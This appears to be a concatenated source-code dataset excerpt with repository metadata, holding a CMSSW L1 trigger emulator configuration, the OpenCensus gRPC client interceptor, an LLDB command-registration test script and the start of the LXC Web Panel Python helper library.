'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/C65D8692-CC1C-DD11-B7B5-001617E30D54.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/C697C4F1-BD1C-DD11-8550-001617C3B66C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/C6DB2D95-CC1C-DD11-8C3F-001617DBD540.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/C6E0A522-C21C-DD11-9C24-000423D6AF24.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/C6ED43E7-BB1C-DD11-8A18-001617DBD49A.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/C80D9AEC-BB1C-DD11-8974-001617C3B76E.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/C8335398-CC1C-DD11-A2D4-001617E30D2C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/C8E8C504-C01C-DD11-85C6-001617E30D38.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/CA2218B6-D01C-DD11-979F-000423D6B42C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/CA368935-C21C-DD11-9788-001617E30F46.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/CA3844EB-BD1C-DD11-913E-001617C3B76E.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/CA65A6FA-BF1C-DD11-8CC1-000423D9880C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/CAB471E2-BD1C-DD11-9D4E-000423DD2F34.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/CC12A30D-C01C-DD11-8A10-001617E30CA4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/CC8E9A1F-C21C-DD11-ADF9-001617DBCF90.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/CE497BC3-D01C-DD11-928A-001617C3B76A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/CE6685CE-D01C-DD11-BE9B-001617C3B64C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/D01B6C02-BE1C-DD11-897C-001617C3B69C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/D06A2FCC-B91C-DD11-A9DA-000423D6101A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/D221ABE5-BB1C-DD11-9DB3-001617E30F46.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/D28A8F02-C01C-DD11-9866-001617DBD540.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/D2B2FDB2-CE1C-DD11-8F56-001617C3B652.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/D47C0DE8-BD1C-DD11-9B8C-000423D94700.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/D6D574D2-BB1C-DD11-981F-001617C3B652.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/D8776455-C81C-DD11-8D7F-001617C3B652.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/D8B0FBB8-D01C-DD11-A27F-001617C3B652.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/D8FF2B18-C01C-DD11-9B55-000423D94C80.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/DA4A4889-CC1C-DD11-8A16-001617C3B652.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/DAD4298E-CA1C-DD11-A10E-0019DB29C614.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/DAEE505E-C81C-DD11-980A-0019DB29C614.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/DC13C55E-C81C-DD11-BAC1-001617C3B614.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/DC1B6554-C61C-DD11-BF49-001617C3B6E2.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/DC4E4EA8-CE1C-DD11-8FC3-001617DBD49A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/DC709BFC-BF1C-DD11-A6B7-000423D6B2D8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/DE27427E-CA1C-DD11-935C-000423D6CA02.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/DE504FEB-BD1C-DD11-B7B8-001617DBD556.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/E06A7CF4-BB1C-DD11-9694-000423D94908.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/E08DE8FC-BF1C-DD11-8C8E-000423D6B444.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/E0A9CA00-BE1C-DD11-9C4E-001617E30D06.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/E0DE281D-BE1C-DD11-8AA4-001617DBCF6A.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/E28F4E88-CA1C-DD11-AD78-001617C3B6E2.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/E2AC1367-C81C-DD11-9EA9-001617DBD49A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/E2D03EA8-CE1C-DD11-BEBD-001617C3B6E2.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/E41BC293-CC1C-DD11-8E24-001617DBD49A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/E438B3FA-BB1C-DD11-87A6-001617C3B6E8.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/E43E694A-C41C-DD11-B161-001617DF785A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/E445BB2A-C21C-DD11-BFE6-0016177CA778.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/E451BF1C-C01C-DD11-8AB4-000423D98834.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/E60810B4-CE1C-DD11-812E-001617C3B6CC.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/E8AFD30A-C01C-DD11-85A6-001617C3B778.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/E8CECFF9-BF1C-DD11-B9C7-000423D6C8EE.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/EAC5E41D-C01C-DD11-8BE1-000423D94A20.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/EAF03AE7-BB1C-DD11-848C-000423D6101A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/EE214960-C81C-DD11-A182-001617DBD540.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/EE4E914E-C41C-DD11-A095-001617C3B69C.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/EE5A5200-BE1C-DD11-81C8-001617DBD5AC.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/EEAFA849-C41C-DD11-8203-001617C3B614.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/F0C47660-C81C-DD11-9107-001617C3B69C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/F2075E91-CA1C-DD11-B1C4-001617C3B710.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/F207EC43-C61C-DD11-A230-001617E30F58.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/F2300AB3-CE1C-DD11-A36B-001617C3B76A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/F2716924-C21C-DD11-B757-001617E30E28.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/F2790FCC-D01C-DD11-97CE-000423D9853C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/F29E7046-C61C-DD11-862A-001617DBD472.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/F2CDC2D1-D21C-DD11-91F2-000423D6C8EE.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/F40BA1F2-BB1C-DD11-9148-000423D98834.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/F45D0661-C81C-DD11-A2A2-000423D6CA42.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/F4C05AC2-B91C-DD11-A0C5-001617C3B6FE.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/F684A2FE-BF1C-DD11-8C85-001617E30D54.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/F6D667DC-BB1C-DD11-8993-001617DBD224.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/F877786C-C81C-DD11-9DBE-000423D9880C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/F8EA1087-CA1C-DD11-BBC5-000423D6CA42.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/FAB1D0DA-BB1C-DD11-BB67-001617C3B6FE.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/FC2172D3-D21C-DD11-B9FB-000423D6CAF2.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/FCAB7B9D-CA1C-DD11-942F-000423D986A8.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/FE771D08-BE1C-DD11-A65E-001617E30F48.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/FEB8AC4D-C61C-DD11-A404-001617C3B79A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/FEB8DB1D-C21C-DD11-96E7-001617C3B614.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0007/FED38120-C21C-DD11-8253-001617C3B5D8.root']
# configuration
#
process.load("Configuration.StandardSequences.FakeConditions_cff")
process.load("Configuration.StandardSequences.GeometryDB_cff")
process.load("L1Trigger.Configuration.L1Config_cff")
# L1 menu
process.load("L1TriggerConfig.L1GtConfigProducers.Luminosity.lumi1x1032.L1Menu_CRUZET200805_gr7_muon_cff")
# RawToDigi all data
process.load("Configuration.StandardSequences.RawToDigi_Data_cff")
# Global Trigger emulator
import L1Trigger.GlobalTrigger.gtDigis_cfi
process.l1GtEmulDigis = L1Trigger.GlobalTrigger.gtDigis_cfi.gtDigis.clone()
# block GCT input and the technical triggers (only FDL and GMT active) 0x0101
process.l1GtParameters.DaqActiveBoards = 0x0105
# block GMT input (0xdd12)
#process.l1GtParameters.DaqActiveBoards = 0x00FF
# block both GCT and GMT (FDL and techTrig active)
#process.l1GtParameters.DaqActiveBoards = 0x0003
# input tag for GMT readout collection:
process.l1GtEmulDigis.GmtInputTag = 'gtDigis'
# input tag for GCT readout collections:
#process.l1GtEmulDigis.GctInputTag = 'gctDigis'
# logical flag to produce the L1 GT DAQ readout record
# if true, produce the record (default)
#process.l1GtEmulDigis.ProduceL1GtDaqRecord = False
# logical flag to produce the L1 GT EVM readout record
# if true, produce the record (default)
#process.l1GtEmulDigis.ProduceL1GtEvmRecord = False
# logical flag to produce the L1 GT object map record
# if true, produce the record (default)
#process.l1GtEmulDigis.ProduceL1GtObjectMapRecord = False
# logical flag to write the PSB content in the L1 GT DAQ record
# if true, write the PSB content in the record (default)
#process.l1GtEmulDigis.WritePsbL1GtDaqRecord = False
# logical flag to read the technical trigger records
# if true, it will read via getMany the available records (default)
#process.l1GtEmulDigis.ReadTechnicalTriggerRecords = False
# number of "bunch crossing in the event" (BxInEvent) to be emulated
# symmetric around L1Accept (BxInEvent = 0):
# 1 (BxInEvent = 0); 3 (F 0 1) (standard record); 5 (E F 0 1 2) (debug record)
# even numbers (except 0) "rounded" to the nearest lower odd number
# negative value: emulate TotalBxInEvent as given in EventSetup
#process.l1GtEmulDigis.EmulateBxInEvent = 3
# Global Trigger report
import L1Trigger.GlobalTriggerAnalyzer.l1GtTrigReport_cfi
process.l1GtTrigReportData = L1Trigger.GlobalTriggerAnalyzer.l1GtTrigReport_cfi.l1GtTrigReport.clone()
process.l1GtTrigReportData.L1GtRecordInputTag = 'gtDigis'
#
import L1Trigger.GlobalTriggerAnalyzer.l1GtTrigReport_cfi
process.l1GtTrigReportEmul = L1Trigger.GlobalTriggerAnalyzer.l1GtTrigReport_cfi.l1GtTrigReport.clone()
process.l1GtTrigReportEmul.L1GtRecordInputTag = 'l1GtEmulDigis'
#
# compare the L1 GT data and emulator digis
process.load("L1Trigger.GlobalTriggerAnalyzer.l1GtDataEmulAnalyzer_cfi")
process.l1GtDataEmulAnalyzer.L1GtEmulInputTag = 'l1GtEmulDigis'
# path to be run
process.p = cms.Path(process.RawToDigi*process.l1GtEmulDigis*process.l1GtDataEmulAnalyzer*process.l1GtTrigReportData*process.l1GtTrigReportEmul)
# services
# Message Logger
process.load("FWCore.MessageLogger.MessageLogger_cfi")
process.MessageLogger.cerr.enable = False
process.MessageLogger.cout = cms.untracked.PSet(
enable = cms.untracked.bool(True),
threshold = cms.untracked.string('INFO'),
INFO = cms.untracked.PSet(
#limit = cms.untracked.int32(-1)
limit = cms.untracked.int32(1000)
)#,
#threshold = cms.untracked.string('DEBUG'), ## DEBUG
#DEBUG = cms.untracked.PSet( ## DEBUG, all messages
#
# limit = cms.untracked.int32(-1)
#)
)
process.MessageLogger.debugModules = ['l1GtEmulDigis', 'l1GtDataEmulAnalyzer']
# histogram service
process.TFileService = cms.Service("TFileService",
fileName = cms.string('L1GtDataFromRawEmulAnalyzer.root')
)
# summary
process.options = cms.untracked.PSet(
wantSummary = cms.untracked.bool(True)
)
# output
process.outputL1GtDataEmul = cms.OutputModule("PoolOutputModule",
fileName = cms.untracked.string('testGt_DataFromRawEmulAnalyzer_output.root'),
outputCommands = cms.untracked.vstring('drop *',
'keep *_l1GtDataDigis_*_*',
'keep *_l1GtEmulDigis_*_*',
'keep *_l1GctDataDigis_*_*')
)
process.outpath = cms.EndPath(process.outputL1GtDataEmul)
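# note (assumption, file name not given here): as a standard CMSSW configuration
# this would typically be executed with `cmsRun <this_config>.py` inside a
# CMSSW environment.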
|
cc4ac77ed4939c041e43e27a022c11153491a137
|
4e4b752c4dbecf0b0d9f7cb86f9f76bb0ffa5d32
|
/contrib/opencensus-ext-grpc/opencensus/ext/grpc/client_interceptor.py
|
288bf650b8f816dc5ea14ba6bc43cb06c29bc526
|
[
"Apache-2.0"
] |
permissive
|
census-instrumentation/opencensus-python
|
ab6bcf12b16677d9ca7fc93a5f96c2946d138a0c
|
3a2d8dfe1db4e0129dc691c35901a0d12127afc1
|
refs/heads/master
| 2023-09-02T13:53:19.757971
| 2023-03-16T22:10:07
| 2023-03-16T22:10:07
| 96,581,030
| 701
| 289
|
Apache-2.0
| 2023-09-14T21:14:09
| 2017-07-07T22:28:28
|
Python
|
UTF-8
|
Python
| false
| false
| 7,892
|
py
|
client_interceptor.py
|
# Copyright 2017, OpenCensus Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import six
import collections
import logging
import grpc
from opencensus.ext import grpc as oc_grpc
from opencensus.ext.grpc import utils as grpc_utils
from opencensus.trace import attributes_helper, execution_context
from opencensus.trace import span as span_module
from opencensus.trace import time_event
from opencensus.trace.propagation import binary_format
log = logging.getLogger(__name__)
ATTRIBUTE_COMPONENT = 'COMPONENT'
ATTRIBUTE_ERROR_NAME = 'ERROR_NAME'
ATTRIBUTE_ERROR_MESSAGE = 'ERROR_MESSAGE'
GRPC_HOST_PORT = 'GRPC_HOST_PORT'
GRPC_METHOD = 'GRPC_METHOD'
SENT_PREFIX = 'Sent'
TIMEOUT = 3
# Do not trace StackDriver Trace exporter activities to avoid deadlock.
CLOUD_TRACE = 'google.devtools.cloudtrace'
class _ClientCallDetails(
collections.namedtuple(
'_ClientCallDetails',
('method', 'timeout', 'metadata', 'credentials')),
grpc.ClientCallDetails):
pass
class OpenCensusClientInterceptor(grpc.UnaryUnaryClientInterceptor,
grpc.UnaryStreamClientInterceptor,
grpc.StreamUnaryClientInterceptor,
grpc.StreamStreamClientInterceptor):
def __init__(self, tracer=None, host_port=None):
self._tracer = tracer
self.host_port = host_port
self._propagator = binary_format.BinaryFormatPropagator()
@property
def tracer(self):
return self._tracer or execution_context.get_opencensus_tracer()
def _start_client_span(self, client_call_details):
span = self.tracer.start_span(
name=_get_span_name(client_call_details)
)
span.span_kind = span_module.SpanKind.CLIENT
# Add the component grpc to span attribute
self.tracer.add_attribute_to_current_span(
attribute_key=attributes_helper.COMMON_ATTRIBUTES.get(
ATTRIBUTE_COMPONENT),
attribute_value='grpc')
# Add the host:port info to span attribute
self.tracer.add_attribute_to_current_span(
attribute_key=attributes_helper.GRPC_ATTRIBUTES.get(
GRPC_HOST_PORT),
attribute_value=self.host_port)
# Add the method to span attribute
self.tracer.add_attribute_to_current_span(
attribute_key=attributes_helper.GRPC_ATTRIBUTES.get(GRPC_METHOD),
attribute_value=str(client_call_details.method))
return span
def _intercept_call(
self, client_call_details, request_iterator, grpc_type
):
metadata = ()
if client_call_details.metadata is not None:
metadata = client_call_details.metadata
# Start a span
current_span = self._start_client_span(client_call_details)
span_context = current_span.context_tracer.span_context
header = self._propagator.to_header(span_context)
grpc_trace_metadata = {
oc_grpc.GRPC_TRACE_KEY: header,
}
if isinstance(metadata, list):
metadata_to_append = list(six.iteritems(grpc_trace_metadata))
else:
metadata_to_append = tuple(six.iteritems(grpc_trace_metadata))
metadata = metadata + metadata_to_append
client_call_details = _ClientCallDetails(
client_call_details.method,
client_call_details.timeout,
metadata,
client_call_details.credentials)
request_iterator = grpc_utils.wrap_iter_with_message_events(
request_or_response_iter=request_iterator,
span=current_span,
message_event_type=time_event.Type.SENT
)
return client_call_details, request_iterator, current_span
def _callback(self, current_span):
def callback(future_response):
grpc_utils.add_message_event(
proto_message=future_response.result(),
span=current_span,
message_event_type=time_event.Type.RECEIVED,
)
self._trace_future_exception(future_response)
self.tracer.end_span()
return callback
def _trace_future_exception(self, response):
# Trace the exception for a grpc.Future if any
exception = response.exception()
if exception is not None:
exception = str(exception)
self.tracer.add_attribute_to_current_span(
attribute_key=attributes_helper.COMMON_ATTRIBUTES.get(
ATTRIBUTE_ERROR_MESSAGE),
attribute_value=exception)
def intercept_unary_unary(
self, continuation, client_call_details, request
):
if CLOUD_TRACE in client_call_details.method:
response = continuation(client_call_details, request)
return response
new_details, new_request, current_span = self._intercept_call(
client_call_details=client_call_details,
request_iterator=iter((request,)),
grpc_type=oc_grpc.UNARY_UNARY)
response = continuation(
new_details,
next(new_request))
response.add_done_callback(self._callback(current_span))
return response
def intercept_unary_stream(
self, continuation, client_call_details, request
):
if CLOUD_TRACE in client_call_details.method:
response = continuation(client_call_details, request)
return response
new_details, new_request_iterator, current_span = self._intercept_call(
client_call_details=client_call_details,
request_iterator=iter((request,)),
grpc_type=oc_grpc.UNARY_STREAM)
return grpc_utils.WrappedResponseIterator(
continuation(new_details, next(new_request_iterator)),
current_span)
def intercept_stream_unary(
self, continuation, client_call_details, request_iterator
):
if CLOUD_TRACE in client_call_details.method:
response = continuation(client_call_details, request_iterator)
return response
new_details, new_request_iterator, current_span = self._intercept_call(
client_call_details=client_call_details,
request_iterator=request_iterator,
grpc_type=oc_grpc.STREAM_UNARY)
response = continuation(
new_details,
new_request_iterator)
response.add_done_callback(self._callback(current_span))
return response
def intercept_stream_stream(
self, continuation, client_call_details, request_iterator
):
if CLOUD_TRACE in client_call_details.method:
response = continuation(client_call_details, request_iterator)
return response
new_details, new_request_iterator, current_span = self._intercept_call(
client_call_details=client_call_details,
request_iterator=request_iterator,
grpc_type=oc_grpc.STREAM_STREAM)
return grpc_utils.WrappedResponseIterator(
continuation(new_details, new_request_iterator), current_span)
def _get_span_name(client_call_details):
"""Generates a span name based off of the gRPC client call details"""
method_name = client_call_details.method[1:].replace('/', '.')
return '{}.{}'.format(SENT_PREFIX, method_name)
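# A minimal usage sketch (assumptions: a gRPC service reachable at
# 'localhost:50051'; generated stubs would then be built on the wrapped
# channel).
if __name__ == '__main__':
    # Wrap a plain client channel so every RPC made through it is recorded
    # as a client span by OpenCensusClientInterceptor.
    _target = 'localhost:50051'
    _interceptor = OpenCensusClientInterceptor(host_port=_target)
    _traced_channel = grpc.intercept_channel(
        grpc.insecure_channel(_target), _interceptor)
    log.info('created traced channel to %s', _target)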
|
4b48032c72fcb49c29763eb725a7cb262efb4f26
|
4d28185e7a78a569f9a449f39f183cac3024f711
|
/packages/Python/lldbsuite/test/commands/command/script/import/foo/foo2.py
|
71657c299c219919a9e1b82ed4fbde338fb3e1b6
|
[
"NCSA",
"Apache-2.0",
"LLVM-exception"
] |
permissive
|
apple/swift-lldb
|
2789bf44f648609a1674ee520ac20b64c95de072
|
d74be846ef3e62de946df343e8c234bde93a8912
|
refs/heads/stable
| 2023-04-06T00:28:15.882479
| 2019-10-25T22:46:59
| 2019-10-25T22:46:59
| 44,838,862
| 780
| 291
|
Apache-2.0
| 2020-01-10T19:28:43
| 2015-10-23T21:13:18
|
C++
|
UTF-8
|
Python
| false
| false
| 294
|
py
|
foo2.py
|
from __future__ import print_function
def foo2_function(debugger, args, result, dict):
print("foo2 says " + args, file=result)
return None
def __lldb_init_module(debugger, session_dict):
debugger.HandleCommand("command script add -f foo2.foo2_function foo2cmd")
return None
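# usage sketch (assumed interactive session; the path below is illustrative):
#   (lldb) command script import /path/to/foo2.py
# `command script import` calls __lldb_init_module above, which registers
# `foo2cmd`, so
#   (lldb) foo2cmd hello
# prints "foo2 says hello".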
|
5c12be7f373ce7e8b27b06bb33dcd0308dcd8403
|
1acbcda9259365865756e6fa559c4b56600e00dc
|
/lwp/__init__.py
|
0a2564e236b316c44b667a78f1bbcd8ac107c371
|
[
"MIT"
] |
permissive
|
lxc-webpanel/LXC-Web-Panel
|
a4ff2fcb99abd0b794526a650a2cd89bc625d849
|
262ac59b8a026cb01ff72a56278673c3fce9b9c0
|
refs/heads/0.2
| 2023-03-07T15:50:05.409894
| 2017-12-21T23:33:51
| 2017-12-21T23:33:51
| 8,950,398
| 441
| 211
|
MIT
| 2020-08-26T23:17:02
| 2013-03-22T11:17:26
|
Python
|
UTF-8
|
Python
| false
| false
| 13,884
|
py
|
__init__.py
|
# LXC Python Library
# for compatibility with LXC 0.8 and 0.9
# on Ubuntu 12.04/12.10/13.04
# Author: Elie Deloumeau
# Contact: elie@deloumeau.fr
# The MIT License (MIT)
# Copyright (c) 2013 Elie Deloumeau
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import sys
sys.path.append('../')
from lxclite import exists, stopped, ContainerDoesntExists
import os
import platform
import re
import subprocess
import time
from io import StringIO
try:
from urllib.request import urlopen
except ImportError:
from urllib2 import urlopen
try:
import configparser
except ImportError:
import ConfigParser as configparser
class CalledProcessError(Exception):
pass
cgroup = {}
cgroup['type'] = 'lxc.network.type'
cgroup['link'] = 'lxc.network.link'
cgroup['flags'] = 'lxc.network.flags'
cgroup['hwaddr'] = 'lxc.network.hwaddr'
cgroup['rootfs'] = 'lxc.rootfs'
cgroup['utsname'] = 'lxc.utsname'
cgroup['arch'] = 'lxc.arch'
cgroup['ipv4'] = 'lxc.network.ipv4'
cgroup['memlimit'] = 'lxc.cgroup.memory.limit_in_bytes'
cgroup['swlimit'] = 'lxc.cgroup.memory.memsw.limit_in_bytes'
cgroup['cpus'] = 'lxc.cgroup.cpuset.cpus'
cgroup['shares'] = 'lxc.cgroup.cpu.shares'
cgroup['deny'] = 'lxc.cgroup.devices.deny'
cgroup['allow'] = 'lxc.cgroup.devices.allow'
def FakeSection(fp):
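    '''
    wraps a section-less config file in a fake [DEFAULT] section so that
    configparser can parse it
    '''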
content = u"[DEFAULT]\n%s" % fp.read()
return StringIO(content)
def DelSection(filename=None):
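    '''
    removes the fake [DEFAULT] section header that configparser writes back
    '''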
if filename:
load = open(filename, 'r')
read = load.readlines()
load.close()
i = 0
        while i < len(read):
            if '[DEFAULT]' in read[i]:
                del read[i]
                break
            i += 1
load = open(filename, 'w')
load.writelines(read)
load.close()
def file_exist(filename):
'''
    checks whether a given file exists
'''
try:
with open(filename) as f:
f.close()
return True
except IOError:
return False
def ls_auto():
'''
returns a list of autostart containers
'''
try:
auto_list = os.listdir('/etc/lxc/auto/')
except OSError:
auto_list = []
return auto_list
def memory_usage(name):
'''
returns memory usage in MB
'''
if not exists(name):
raise ContainerDoesntExists(
"The container (%s) does not exist!" % name)
if name in stopped():
return 0
cmd = ['lxc-cgroup -n %s memory.usage_in_bytes' % name]
try:
out = subprocess.check_output(cmd, shell=True,
universal_newlines=True).splitlines()
except:
return 0
return int(out[0])/1024/1024
def host_memory_usage():
'''
returns a dict of host memory usage values
{'percent': int((used/total)*100),
'percent_cached':int((cached/total)*100),
'used': int(used/1024),
'total': int(total/1024)}
'''
out = open('/proc/meminfo')
for line in out:
if 'MemTotal:' == line.split()[0]:
split = line.split()
total = float(split[1])
if 'MemFree:' == line.split()[0]:
split = line.split()
free = float(split[1])
if 'Buffers:' == line.split()[0]:
split = line.split()
buffers = float(split[1])
if 'Cached:' == line.split()[0]:
split = line.split()
cached = float(split[1])
out.close()
used = (total - (free + buffers + cached))
return {'percent': int((used/total)*100),
'percent_cached': int(((cached)/total)*100),
'used': int(used/1024),
'total': int(total/1024)}
def host_cpu_percent():
'''
returns CPU usage in percent
'''
f = open('/proc/stat', 'r')
line = f.readlines()[0]
data = line.split()
previdle = float(data[4])
prevtotal = float(data[1]) + float(data[2]) + \
float(data[3]) + float(data[4])
f.close()
time.sleep(0.1)
f = open('/proc/stat', 'r')
line = f.readlines()[0]
data = line.split()
idle = float(data[4])
total = float(data[1]) + float(data[2]) + float(data[3]) + float(data[4])
f.close()
intervaltotal = total - prevtotal
percent = 100 * (intervaltotal - (idle - previdle)) / intervaltotal
return str('%.1f' % percent)
def host_disk_usage(partition=None):
'''
returns a dict of disk usage values
{'total': usage[1],
'used': usage[2],
'free': usage[3],
'percent': usage[4]}
'''
if not partition:
partition = '/'
usage = subprocess.check_output(['df -h %s' % partition],
universal_newlines=True,
shell=True).split('\n')[1].split()
return {'total': usage[1],
'used': usage[2],
'free': usage[3],
'percent': usage[4]}
def host_uptime():
'''
returns a dict of the system uptime
{'day': days,
'time': '%d:%02d' % (hours,minutes)}
'''
f = open('/proc/uptime')
uptime = int(f.readlines()[0].split('.')[0])
minutes = uptime / 60 % 60
hours = uptime / 60 / 60 % 24
days = uptime / 60 / 60 / 24
f.close()
return {'day': days,
'time': '%d:%02d' % (hours, minutes)}
def check_ubuntu():
'''
    returns the host distribution name and version
'''
dist = '%s %s' % (platform.linux_distribution()[0],
platform.linux_distribution()[1])
return dist
def get_templates_list():
'''
returns a sorted lxc templates list
'''
templates = []
path = None
try:
path = os.listdir('/usr/share/lxc/templates')
except:
path = os.listdir('/usr/lib/lxc/templates')
if path:
for line in path:
templates.append(line.replace('lxc-', ''))
return sorted(templates)
def check_version():
'''
    returns a dict with the current and latest LWP versions
'''
f = open('version')
current = float(f.read())
f.close()
latest = float(urlopen('http://lxc-webpanel.github.com/version').read())
return {'current': current,
'latest': latest}
def get_net_settings_fname():
filename = '/etc/default/lxc-net'
if not file_exist(filename):
filename = '/etc/default/lxc'
if not file_exist(filename):
filename = None
return filename
def get_net_settings():
'''
returns a dict of all known settings for LXC networking
'''
filename = get_net_settings_fname()
if not filename:
return False
config = configparser.SafeConfigParser()
cfg = {}
config.readfp(FakeSection(open(filename)))
cfg['use'] = config.get('DEFAULT', 'USE_LXC_BRIDGE').strip('"')
cfg['bridge'] = config.get('DEFAULT', 'LXC_BRIDGE').strip('"')
cfg['address'] = config.get('DEFAULT', 'LXC_ADDR').strip('"')
cfg['netmask'] = config.get('DEFAULT', 'LXC_NETMASK').strip('"')
cfg['network'] = config.get('DEFAULT', 'LXC_NETWORK').strip('"')
cfg['range'] = config.get('DEFAULT', 'LXC_DHCP_RANGE').strip('"')
cfg['max'] = config.get('DEFAULT', 'LXC_DHCP_MAX').strip('"')
return cfg
def get_container_settings(name):
'''
returns a dict of all utils settings for a container
'''
if os.geteuid():
filename = os.path.expanduser('~/.local/share/lxc/%s/config' % name)
else:
filename = '/var/lib/lxc/%s/config' % name
if not file_exist(filename):
return False
config = configparser.SafeConfigParser()
cfg = {}
config.readfp(FakeSection(open(filename)))
try:
cfg['type'] = config.get('DEFAULT', cgroup['type'])
except configparser.NoOptionError:
cfg['type'] = ''
try:
cfg['link'] = config.get('DEFAULT', cgroup['link'])
except configparser.NoOptionError:
cfg['link'] = ''
try:
cfg['flags'] = config.get('DEFAULT', cgroup['flags'])
except configparser.NoOptionError:
cfg['flags'] = ''
try:
cfg['hwaddr'] = config.get('DEFAULT', cgroup['hwaddr'])
except configparser.NoOptionError:
cfg['hwaddr'] = ''
try:
cfg['rootfs'] = config.get('DEFAULT', cgroup['rootfs'])
